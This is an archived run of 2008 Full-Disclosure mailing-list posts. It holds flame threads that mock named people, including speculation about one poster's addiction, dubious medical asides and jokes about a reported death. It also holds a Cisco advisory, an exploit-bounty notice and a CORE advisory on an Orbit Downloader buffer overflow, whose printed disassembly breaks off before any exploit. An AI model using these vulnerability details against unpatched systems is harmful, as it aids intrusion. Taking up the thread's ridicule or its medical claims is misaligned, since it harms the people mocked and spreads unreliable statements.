In-Reply-To: <82abd3a70804020614r504fd633mbf75a8cdde17564d@mail.gmail.com>
References: <c251dbae0804020323x88b396ds64edb77d235dfa3@mail.gmail.com>
	<82abd3a70804020614r504fd633mbf75a8cdde17564d@mail.gmail.com>
Message-ID: <8e2fa2650804030658q775caf32l64846ad96b6d03a0@mail.gmail.com>

Haha, that's nice.  How's that for ethical behavior? :)

On Wed, Apr 2, 2008 at 9:14 AM, Michael Simpson <mikie.simpson at gmail.com>
wrote:

> On 4/2/08, Cassidy MacFarlane <thecmac at gmail.com> wrote:
> > "Youre playing with fire. Fire that cannot be put out with words but
> >  only inflame the situation of which you are misinformed."
> > - n3td3v
> >
> lolz
>
> and the classic:
>
> Hello Mi5, Mi6, Symantec
>
>
> I have information regarding Yahoo
>
>
> Reference:
>
> http://groups.google.com/group/n3td3v/browse_wank/thread/7b60d3fbd0eb9a77/7d1f85fbe122fb29#7d1f85fbe122fb29
>
>
> I used to be his friend but now he fell out with me, so I want to tell
> everyone about him, because he's a yahoo employee i used to give
> "intelligence" to, but now he backstabbed me, and he miscalculated how
> much i knew about him and his "circle of friends".
>
>
> He works for Yahoo
>
>
> Contact me on e-mail and we can exchange phone numbers mibbe go out
> for a meal, circle-jerk &c
>
>
> Regards,
>
>
> n3td3v
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080403/132e94df/attachment.html 

From groffg at gmgdesign.com  Thu Apr  3 15:02:04 2008
From: groffg at gmgdesign.com (Garrett M. Groff)
Date: Thu, 3 Apr 2008 10:02:04 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass
	securityconferencespamming its f****** gay
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com><d7a80eb10804020922s6b4810e0o3a41bffc05b24ae7@mail.gmail.com><4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com><4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com><27886.1207189079@turing-police.cc.vt.edu><fec013240804021927h432e01bfyb6add150141cda87@mail.gmail.com><030b01c89543$0b481540$6401a8c0@maryl><C4B44D4D4D0053622A781365@Macintosh.local><82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>
	<6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com>
Message-ID: <004e01c89593$4cec60f0$336b880a@softpro.corp>

Regarding the particular person in question, I'll defer to others who know 
him (or her, or they, or whomever) better than I do. Instead, I'll say that, 
generally, on lists like FD, there is a minority of out-spoken personalities 
who sadly support the stereotypical hacker persona: condescending egoists 
who are socially inept and emotionally charged when discussing topics that 
relate to their knowledge domain. That's unfortunate, since the broader IT 
security community is poorly represented due to attention-seeking zealots.

Regarding the idea of "oulawing security conference spamming," I'd say the 
literal idea of outlawing cross-posts to multiple security mailing lists is 
a bad idea. The idea that the legislature should write into law legislation 
that reduces our freedom in such a sense is a slippery slope borne of 
emotionalism and narrowness. What else should the government do to curtail 
our freedoms? I tend to side with libertarian types (though I don't call 
myself a "libertarian" un-qualified) on what the government should do and 
what they should not do. And micro-manage security mailing lists is 
something they should not do. It's a bad idea and would make a dreadful 
precedent.

- G



----- Original Message ----- 
From: Ureleet
To: Michael Simpson
Cc: full-disclosure at lists.grok.org.uk
Sent: Thursday, April 03, 2008 9:45 AM
Subject: Re: [Full-disclosure] Fwd: Let's outlaw mass 
securityconferencespamming its fucking gay


or, he's just stupid?


spade equals spade.


On Thu, Apr 3, 2008 at 4:11 AM, Michael Simpson <mikie.simpson at gmail.com> 
wrote:

On 4/3/08, Paul Schmehl <pauls at utdallas.edu> wrote:
> --On April 3, 2008 12:27:35 AM -0400 Mary Landesman <mlande at bellsouth.net>
> wrote:
>
> > Referring to oneself in the third person can be a symptom of identity
> > confusion or identity alteration, a subset or trait of dissociation. In
> > ancient times, it was referred to as demonic possession.
> >
> > Self-objectification is also a trait of narcissism, perhaps because
> > narcissists love and feel empowered by (possession of) objects. And what
> > better object for a narcissist to love than themselves, objectified?
> > Other traits associated with narcissism are bragging, attention-seeking,
> > delusions of grandeur, etc. In modern times, I believe it is sometimes
> > referred to as being a bore.
> >
>
> Or boring a bee?
>
> Paul Schmehl (pauls at utdallas.edu)
> Senior Information Security Analyst
> The University of Texas at Dallas
> http://www.utdallas.edu/ir/security/


As a medic working as a associate specialist in the treatment of
substance misuse disorder for the last few years n3td3v reminds me of
my patients who indulge in polydrug abuse mainly involving cocaine and
alcohol, often in combination.

This is a very dangerous thing to do due to the 2 drugs being combined
by the liver to form cocaethylene which is significantly more euphoric
and hepatotoxic.

-tip i have done some "n of 1" trials with patients showing that
antabuse (disulphiram) can help with this as it seems to inhibit
dopamine decarboxylase in the brain thus raising basal dopamine levels
reducing cravings as well as preventing alcohol use. Modafenil also
seems quite promising for stimulant misuse but my bosses are being
slow about letting me set up a proper double-blind placebo controlled
study of this.

I also think this is why the analysis of n3td3v done previously came
to the conclusion that it was several separate individuals. It is
merely one guy in different states of intoxication.

The evolution of his evolving addiction and deteriorating mental
health has been quite clear over the last few years.

Soon , if he follows the pattern set by many Scots indulging in hard
drug use he will start to use benzodiazepines more and more and if he
is very unlucky he will be exposed to heroin.
At this point he will go away and FD can return to its true nature as
a list for sec matters with occasional furry pr0n spam.

:-)

mike


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/






_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/ 



From mlande at bellsouth.net  Thu Apr  3 15:36:15 2008
From: mlande at bellsouth.net (Mary Landesman)
Date: Thu, 3 Apr 2008 10:36:15 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass
	securityconferencespamming its fucking gay
In-Reply-To: <82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com><d7a80eb10804020922s6b4810e0o3a41bffc05b24ae7@mail.gmail.com><4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com><4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com><27886.1207189079@turing-police.cc.vt.edu><fec013240804021927h432e01bfyb6add150141cda87@mail.gmail.com><030b01c89543$0b481540$6401a8c0@maryl><C4B44D4D4D0053622A781365@Macintosh.local>
	<82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>
Message-ID: <019a01c89598$12d07c80$6401a8c0@maryl>

I feel compelled to point out that my comments were meant tongue-in-cheek,
hence the 'demonic possession', 'being a bore' reference. 

I should never underestimate the necessity of a well placed :-)

-- Mary

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk
[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Michael
Simpson
Sent: Thursday, April 03, 2008 4:11 AM
To: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Fwd: Let's outlaw mass
securityconferencespamming its fucking gay

On 4/3/08, Paul Schmehl <pauls at utdallas.edu> wrote:
> --On April 3, 2008 12:27:35 AM -0400 Mary Landesman 
> <mlande at bellsouth.net>
> wrote:
>
> > Referring to oneself in the third person can be a symptom of 
> > identity confusion or identity alteration, a subset or trait of 
> > dissociation. In ancient times, it was referred to as demonic
possession.
> >
> > Self-objectification is also a trait of narcissism, perhaps because 
> > narcissists love and feel empowered by (possession of) objects. And 
> > what better object for a narcissist to love than themselves,
objectified?
> > Other traits associated with narcissism are bragging, 
> > attention-seeking, delusions of grandeur, etc. In modern times, I 
> > believe it is sometimes referred to as being a bore.
> >
>
> Or boring a bee?
>
> Paul Schmehl (pauls at utdallas.edu)
> Senior Information Security Analyst
> The University of Texas at Dallas
> http://www.utdallas.edu/ir/security/

As a medic working as a associate specialist in the treatment of substance
misuse disorder for the last few years n3td3v reminds me of my patients who
indulge in polydrug abuse mainly involving cocaine and alcohol, often in
combination.

This is a very dangerous thing to do due to the 2 drugs being combined by
the liver to form cocaethylene which is significantly more euphoric and
hepatotoxic.

-tip i have done some "n of 1" trials with patients showing that antabuse
(disulphiram) can help with this as it seems to inhibit dopamine
decarboxylase in the brain thus raising basal dopamine levels reducing
cravings as well as preventing alcohol use. Modafenil also seems quite
promising for stimulant misuse but my bosses are being slow about letting me
set up a proper double-blind placebo controlled study of this.

I also think this is why the analysis of n3td3v done previously came to the
conclusion that it was several separate individuals. It is merely one guy in
different states of intoxication.

The evolution of his evolving addiction and deteriorating mental health has
been quite clear over the last few years.

Soon , if he follows the pattern set by many Scots indulging in hard drug
use he will start to use benzodiazepines more and more and if he is very
unlucky he will be exposed to heroin.
At this point he will go away and FD can return to its true nature as a list
for sec matters with occasional furry pr0n spam.

:-)

mike

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



From se_cur_ity at hotmail.com  Thu Apr  3 16:18:53 2008
From: se_cur_ity at hotmail.com (Morning Wood)
Date: Thu, 3 Apr 2008 08:18:53 -0700
Subject: [Full-disclosure] RIP epic
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com><d7a80eb10804020922s6b4810e0o3a41bffc05b24ae7@mail.gmail.com><4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com><4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com><27886.1207189079@turing-police.cc.vt.edu><fec013240804021927h432e01bfyb6add150141cda87@mail.gmail.com><030b01c89543$0b481540$6401a8c0@maryl><C4B44D4D4D0053622A781365@Macintosh.local><82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>
	<019a01c89598$12d07c80$6401a8c0@maryl>
Message-ID: <BAY124-DAV15D6F199D017AD4AA9A07D9F70@phx.gbl>

RIP epic - http://www.hack3r.com

You will be missed, fly on bro.



From razishaban at gmail.com  Thu Apr  3 16:28:11 2008
From: razishaban at gmail.com (Razi Shaban)
Date: Thu, 3 Apr 2008 18:28:11 +0300
Subject: [Full-disclosure] RIP epic
In-Reply-To: <BAY124-DAV15D6F199D017AD4AA9A07D9F70@phx.gbl>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com>
	<4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com>
	<4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com>
	<27886.1207189079@turing-police.cc.vt.edu>
	<fec013240804021927h432e01bfyb6add150141cda87@mail.gmail.com>
	<030b01c89543$0b481540$6401a8c0@maryl>
	<C4B44D4D4D0053622A781365@Macintosh.local>
	<82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>
	<019a01c89598$12d07c80$6401a8c0@maryl>
	<BAY124-DAV15D6F199D017AD4AA9A07D9F70@phx.gbl>
Message-ID: <2d792fb20804030828s2edc2ca1mc2573b246141555f@mail.gmail.com>

What happened to him?

--
Razi

On 4/3/08, Morning Wood <se_cur_ity at hotmail.com> wrote:
> RIP epic - http://www.hack3r.com
>
>  You will be missed, fly on bro.
>
>  _______________________________________________
>  Full-Disclosure - We believe in it.
>  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>  Hosted and sponsored by Secunia - http://secunia.com/
>



From psirt at cisco.com  Thu Apr  3 17:00:00 2008
From: psirt at cisco.com (Cisco Systems Product Security Incident Response Team)
Date: Thu, 03 Apr 2008 16:00:00 -0000
Subject: [Full-disclosure] Cisco Security Advisory: Cisco Unified
	Communications Disaster Recovery Framework Command Execution
	Vulnerability
Message-ID: <20080403.drf@psirt.cisco.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Cisco Security Advisory: Cisco Unified Communications Disaster
Recovery Framework Command Execution Vulnerability

Advisory ID: cisco-sa-20080403-drf

http://www.cisco.com/warp/public/707/cisco-sa-20080403-drf.shtml

Revision 1.0

For Public Release 2008 April 03 1600 UTC (GMT)

- ---------------------------------------------------------------------

Summary
=======

Several products in the Cisco Unified Communications family of
products contain a command execution vulnerability in the Disaster
Recovery Framework (DRF) feature. A remote, unauthenticated user
could exploit this vulnerability to execute arbitrary commands that
may allow full administrative access to affected systems. There is a
workaround for this vulnerability.

Cisco has released free software updates that address this
vulnerability.

This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080403-drf.shtml

Affected Products
=================

Vulnerable Products
+------------------

The following Cisco products are known to be vulnerable:

  * Cisco Unified Communications Manager (CUCM) 5.x and 6.x
  * Cisco Unified Communications Manager Business Edition
  * Cisco Unified Precense 1.x and 6.x
  * Cisco Emergency Responder 2.x
  * Cisco Mobility Manager 2.x

Products Confirmed Not Vulnerable
+--------------------------------

Cisco Unified Communications Manager versions 3.x and 4.x are not
vulnerable. No other Cisco products are currently known to be
affected by these vulnerabilities.

Details
=======

The Disaster Recovery Framework (DRF) is a feature shared among
several products in the Cisco Unified Communications family of
products. DRF allows administrators to backup and restore a system
configuration to a local tape drive or remote server.

The DRF Master server is responsible for performing backup and
restoration requests. This vulnerability documents an issue where the
DRF Master server does not perform authentication on requests that it
receives over the network. A remote, unauthenticated user can connect
to the DRF Master server and may be able to perform any DRF-related
tasks. These tasks include:

  * Modifying or deleting a scheduled backup
  * Copying a system backup to a remote, user-specified server
  * Restoring a user-specified configuration from a remote server
  * Execute arbitrary operating system commands

An attacker could exploit this vulnerability to cause a denial of
service condition, obtain sensitive configuration information,
overwrite configuration parameters, or execute arbitrary commands
with full administrative privileges.

This vulnerability is documented in CVE-2008-1154 and the following
Cisco Bug IDs:

  * CSCso53771 - Cisco Unified Communications Manager 5.x and 6.x

Vulnerability Scoring Details
=============================

Cisco has provided scores for the vulnerability in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding
CVSS at

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at

http://intellishield.cisco.com/security/alertmanager/cvss

CSCso53771 - Unauthenticated Access to Disaster Recovery Framework

CVSS Base Score - 10
  Access Vector:          Network
  Access Complexity:      Low
  Authentication:         None
  Confidentiality Impact: Complete
  Integrity Impact:       Complete
  Availability Impact:    Complete
CVSS Temporal Score - 8.3
  Exploitability:         Functional
  Remediation Level:      Official-Fix
  Report Confidence:      Confirmed

Impact
======

Successful exploitation of this vulnerability could allow a remote,
unauthenticated attacker to cause a denial of service condition,
obtain sensitive configuration information, overwrite configuration
parameters or execute arbitrary commands with full administrative
privileges.

Software Versions and Fixes
===========================

When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.

Fixed software is available for the following Cisco products. This
advisory will be updated as additional fixes are available.

A patch has been provided that can be applied to CUCM 5.x and 6.x,
CUCMBE, Cisco Unified Presence 1.x and 6.x, Cisco Emergency Responder
2.x, and Cisco Mobility Manager 2.x. The filename is
ciscocm.CSCso53771.security.patch.cop and can be downloaded at the
following link:

http://www.cisco.com/cgi-bin/tablebuild.pl/callmgr-utilpage?psrtdcat20e2

Please consult the COP file Readme for installation instructions.

Workarounds
===========

Administrators can mitigate this vulnerability by disabling the DRF
Master service. However, administrators should exercise caution when
disabling the DRF Master service, as system backups will not occur
while the service is stopped. Administrators are encouraged to
perform a complete system backup before employing this workaround and
use care when making configuration changes until the DRF Master
service can be safely re-enabled.

Instructions for disabling the DRF Master service on Cisco Unified
Communications Manager systems are available at the following link:

http://www.cisco.com/en/US/docs/voice_ip_comm/cucm/service/5_0_1/ccmsrva/sasrvact.html#wp1048220

The vulnerability may be mitigated by restricting access to the DRF
Master service (TCP port 4040). For a Cisco Unified Communications
Manager cluster, access to the port should be restricted to valid
cluster nodes.

Additional mitigation techniques that can be deployed on Cisco
devices within the network are available in the Cisco Applied
Mitigation Bulletin companion document for this advisory:

http://www.cisco.com/warp/public/707/cisco-amb-20080403-drf.shtml

Obtaining Fixed Software
========================

Cisco has released free software updates that address this
vulnerability. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound by
the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml

Do not contact psirt at cisco.com or security-alert at cisco.com for
software upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com

Customers using Third Party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.

  * +1 800 553 2447 (toll free from within North America)
  * +1 408 526 7209 (toll call from anywhere in the world)
  * e-mail: tac at cisco.com

Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.

Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.

Exploitation and Public Announcements
=====================================

The Cisco PSIRT is not aware of any malicious use of the
vulnerability described in this advisory.

This vulnerability was reported to Cisco by VoIPshield Systems.

Status of this Notice: FINAL
============================

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.

Distribution
============

This advisory is posted on Cisco's worldwide website at:

http://www.cisco.com/warp/public/707/cisco-sa-20080403-drf.shtml

In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.

  * cust-security-announce at cisco.com
  * first-teams at first.org
  * bugtraq at securityfocus.com
  * vulnwatch at vulnwatch.org
  * cisco at spot.colorado.edu
  * cisco-nsp at puck.nether.net
  * full-disclosure at lists.grok.org.uk
  * comp.dcom.sys.cisco at newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.

Revision History
================

+---------------------------------------+
| Revision |               | Initial    |
| 1.0      | 2008-April-03 | public     |
|          |               | release    |
+---------------------------------------+

Cisco Security Procedures
=========================

Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. 
This includes instructions for press inquiries regarding Cisco
security notices.  All Cisco security advisories are available at
http://www.cisco.com/go/psirt.

- ---------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (Darwin)

iD8DBQFH9P4/86n/Gc8U/uARAgP1AKCYJS+NnmfcbOa6X/bOGX//WtZ9bQCdE8eQ
ujmH9JrSK7JatP5eShSBxvQ=
=uxdK
-----END PGP SIGNATURE-----



From vulnwatch at digitalarmaments.com  Thu Apr  3 16:39:06 2008
From: vulnwatch at digitalarmaments.com (Vulnwatch)
Date: Thu, 03 Apr 2008 17:39:06 +0200
Subject: [Full-disclosure] Digital Armaments March-April Hacking Challenge:
 5, 000$ Prize - Client Vulnerabilities and Exploit
Message-ID: <47F4FA1A.4090609@digitalarmaments.com>

Digital Armaments March-April Hacking Challenge: 5,000$ Prize - Client 

Vulnerabilities and Exploit

Digital Armaments Advisory is 03.15.2008
http://digitalarmaments.com/content/view/46/1/

I. Details

Digital Armaments officially announce the launch of March-April hacking 
challenge.
The challenge starts on March 1. For the March-April Challenge, Digital 
Armaments will give a prize of 5,000$ for each submission that results 
in a Exploitable Vulnerability or Working Exploit for Windows or Windows 
Diffuse Application. This should include example and documentation.

The submission must be sent during the March/April months and be 
received by midnight EST on April 30, 2008. The 5,000$ PRIZE will be an 
extra added to the normal vulnerability payment (check the DACP scheme).



II. References

For further information on Digital Armaments Contributor Program (DACP) 
please refer at the contribute section.
Details of credits value can be found at the contribute section and in 
the FAQs section.



III. Legal Notices

Copyright ? 2008 Digital Armaments Inc.

Redistribution of this alert electronically is allowed. It should not be 
edited in any way. Reprint the whole is allowed, partial reprint is not 
permitted. For any other request please email 
customerservice at digitalarmaments.com for permission.
Disclaimer: The information in the advisory is believed to be accurate 
at the time of publishing based on currently available information. Use 
of the information constitutes acceptance for use in an AS IS condition. 
There are no warranties with regard to this information. Neither the 
author nor the publisher accepts any liability for any direct, indirect, 
or consequential loss or damage arising from use of, or reliance on, 
this information.




From soufre at gmail.com  Thu Apr  3 18:36:00 2008
From: soufre at gmail.com (I. D.)
Date: Thu, 3 Apr 2008 13:36:00 -0400
Subject: [Full-disclosure] RIP epic
In-Reply-To: <2d792fb20804030828s2edc2ca1mc2573b246141555f@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com>
	<4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com>
	<27886.1207189079@turing-police.cc.vt.edu>
	<fec013240804021927h432e01bfyb6add150141cda87@mail.gmail.com>
	<030b01c89543$0b481540$6401a8c0@maryl>
	<C4B44D4D4D0053622A781365@Macintosh.local>
	<82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>
	<019a01c89598$12d07c80$6401a8c0@maryl>
	<BAY124-DAV15D6F199D017AD4AA9A07D9F70@phx.gbl>
	<2d792fb20804030828s2edc2ca1mc2573b246141555f@mail.gmail.com>
Message-ID: <71c852d10804031036g68350069g440482e38f889d7a@mail.gmail.com>

Who cares? Just a two-bit 'hacker' (even lied about working at Novell etc)
pulling a RaT, doubt he's even dead. But a man can hope.

On Thu, Apr 3, 2008 at 11:28 AM, Razi Shaban <razishaban at gmail.com> wrote:

> What happened to him?
>
> --
> Razi
>
> On 4/3/08, Morning Wood <se_cur_ity at hotmail.com> wrote:
> > RIP epic - http://www.hack3r.com
> >
> >  You will be missed, fly on bro.
> >
> >  _______________________________________________
> >  Full-Disclosure - We believe in it.
> >  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >  Hosted and sponsored by Secunia - http://secunia.com/
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080403/60034265/attachment.html 

From joey.mengele at hushmail.com  Thu Apr  3 19:12:11 2008
From: joey.mengele at hushmail.com (Joey Mengele)
Date: Thu, 03 Apr 2008 14:12:11 -0400
Subject: [Full-disclosure] RIP epic
Message-ID: <20080403181212.278B32003D@mailserver7.hushmail.com>

I heard he accidentally Dead Van Duded himself while cleaning his 
shotgun LOLOLOL.

J

On Thu, 03 Apr 2008 13:36:00 -0400 "I. D." <soufre at gmail.com> wrote:
>Who cares? Just a two-bit 'hacker' (even lied about working at 
>Novell etc)
>pulling a RaT, doubt he's even dead. But a man can hope.
>
>On Thu, Apr 3, 2008 at 11:28 AM, Razi Shaban 
><razishaban at gmail.com> wrote:
>
>> What happened to him?
>>
>> --
>> Razi
>>
>> On 4/3/08, Morning Wood <se_cur_ity at hotmail.com> wrote:
>> > RIP epic - http://www.hack3r.com
>> >
>> >  You will be missed, fly on bro.
>> >
>> >  _______________________________________________
>> >  Full-Disclosure - We believe in it.
>> >  Charter: http://lists.grok.org.uk/full-disclosure-
>charter.html
>> >  Hosted and sponsored by Secunia - http://secunia.com/
>> >
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/

--
Click now for great deals on quality business cards!
http://tagline.hushmail.com/fc/REAK6ZBNoFk253woXiX9qznLAFCjSC8EH7DfdRHbFScKtHp7R40FgE/
>>



From jeffrey.bellushi at gmail.com  Thu Apr  3 20:47:21 2008
From: jeffrey.bellushi at gmail.com (Jeffrey Bellushi)
Date: Thu, 3 Apr 2008 15:47:21 -0400
Subject: [Full-disclosure] CEH Training
Message-ID: <a2ce76560804031247n77be1b6epca073dda1c449c7f@mail.gmail.com>

All,

Anyone ever been to http://unethicalhacker.net/ for free CEH training?  I'm
wondering if it has a good success rate.

Jeffrey
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080403/e39431f3/attachment.html 

From advisories at coresecurity.com  Thu Apr  3 22:15:45 2008
From: advisories at coresecurity.com (CORE Security Technologies Advisories)
Date: Thu, 03 Apr 2008 18:15:45 -0300
Subject: [Full-disclosure] CORE-2008-0314 - Orbit Downloader "Download
	failed" buffer overflow
Message-ID: <47F54901.10103@coresecurity.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

      Core Security Technologies - CoreLabs Advisory
           http://www.coresecurity.com/corelabs/

    Orbit Downloader "Download failed" buffer overflow


*Advisory Information*

Title: Orbit Downloader "Download failed" buffer overflow
Advisory ID: CORE-2008-0314
Advisory URL: http://www.coresecurity.com/?action=item&id=2211
Date published: 2008-04-03
Date of last update: 2008-04-03
Vendors contacted: Orbit Downloader team
Release mode: Coordinated release


*Vulnerability Information*

Class: Buffer overflow
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 28541	
CVE Name: CVE-2008-1602	


*Vulnerability Description*

Orbit downloader [1] is vulnerable to a buffer overflow attack, which
can be exploited by malicious remote attackers to execute arbitrary
code. The vulnerability is due to Orbit not properly converting an URL
ascii string to unicode. This can be exploited to execute arbitrary code
by downloading a file from a specially crafted URL.


*Vulnerable Packages*

. Orbit downloader 2.6.3 and 2.6.4.
. Older versions could be vulnerables too, but they were not tested.


*Non-vulnerable Packages*

. Orbit downloader 2.6.5.


*Vendor Information, Solutions and Workarounds*

Update to Orbit downloader 2.6.5, available at
http://dl.orbitdownloader.com/dl/OrbitDownloaderSetup.exe, or visit the
vendor homepage at http://www.orbitdownloader.com.


*Credits*

This vulnerability was discovered and researched by Diego Juarez from
Core Security Technologies.


*Technical Description / Proof of Concept Code*

When Orbit is unable to download a file, a balloon control is popped in
the notification area. This is the code that takes care of drawing text
to said control:

/-----------

.text:004A56D0 sub_4A56D0  proc near        ; CODE XREF: sub_42AAC0+321 p
.text:004A56D0                              ; sub_439610+321 p ...
.text:004A56D0
.text:004A56D0 String   = word ptr -2000h
.text:004A56D0 hDC      = dword ptr  4
.text:004A56D0 arg_4    = dword ptr  8
.text:004A56D0 lpRect   = dword ptr  0Ch
.text:004A56D0 uFormat  = dword ptr  10h
.text:004A56D0
.text:004A56D0    mov     eax, 2000h        ; reserve 0x2000 (8192)
bytes in the stack
.text:004A56D5    call    __alloca_probe
.text:004A56DA    push    edi
.text:004A56DB    mov     ecx, 800h
.text:004A56E0    xor     eax, eax
.text:004A56E2    lea     edi, [esp+2004h+String]
.text:004A56E6    rep stosd
.text:004A56E8    mov     eax, [esp+2004h+arg_4]
.text:004A56EF    pop     edi
.text:004A56F0    mov     ecx, [eax+8]
.text:004A56F3    mov     eax, [eax+4]
.text:004A56F6    test    eax, eax
.text:004A56F8    jnz     short loc_4A56FF
.text:004A56FA    mov     eax, ds:?_C@?1??_Nullstr@? basic_string at DU?
char_traits at D@std@@V? allocator at D@2@@std@@CAPBDXZ at 4DB ;
.text:004A56FF
.text:004A56FF loc_4A56FF:                  ; CODE XREF: sub_4A56D0+28 j
.text:004A56FF    lea     edx, [esp+2000h+String]
.text:004A5703    push    2000h             ; cchWideChar (write up to
16384 bytes to the buffer)
.text:004A5708    push    edx               ; lpWideCharStr
.text:004A5709    push    ecx               ; cchMultiByte
.text:004A570A    push    eax               ; lpMultiByteStr
.text:004A570B    push    0                 ; dwFlags
.text:004A570D    push    0                 ; CodePage
.text:004A570F    call    ds:MultiByteToWideChar
